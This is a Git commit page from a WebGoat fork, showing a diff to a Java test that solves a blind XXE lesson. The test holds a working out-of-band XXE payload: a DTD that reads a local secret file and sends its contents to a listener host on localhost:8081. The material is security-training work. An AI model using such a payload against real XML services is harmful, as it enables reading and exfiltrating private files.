dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Extended and fixed some lessons

Browse Source
This commit is contained in:
Nanne Baars
2018-05-27 20:37:44 +02:00
parent d2b6725f3b
commit 1edceb0aa8
16 changed files with 152 additions and 168 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java
View File

@ -71,6 +71,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
@Test
public void solve() throws Exception {
File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
//Host DTD on WebWolf site
String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
"<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:8081/landing?text=%file;'>\">\n" +
@ -80,6 +81,8 @@ public class BlindSendFileAssignmentTest extends LessonTest {
.withStatus(200)
.withBody(dtd)));
webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
//Make the request from WebGoat
String xml = "<?xml version=\"1.0\"?>" +
"<!DOCTYPE comment [" +
"<!ENTITY % remote SYSTEM \"http://localhost:8081/files/test.dtd\">" +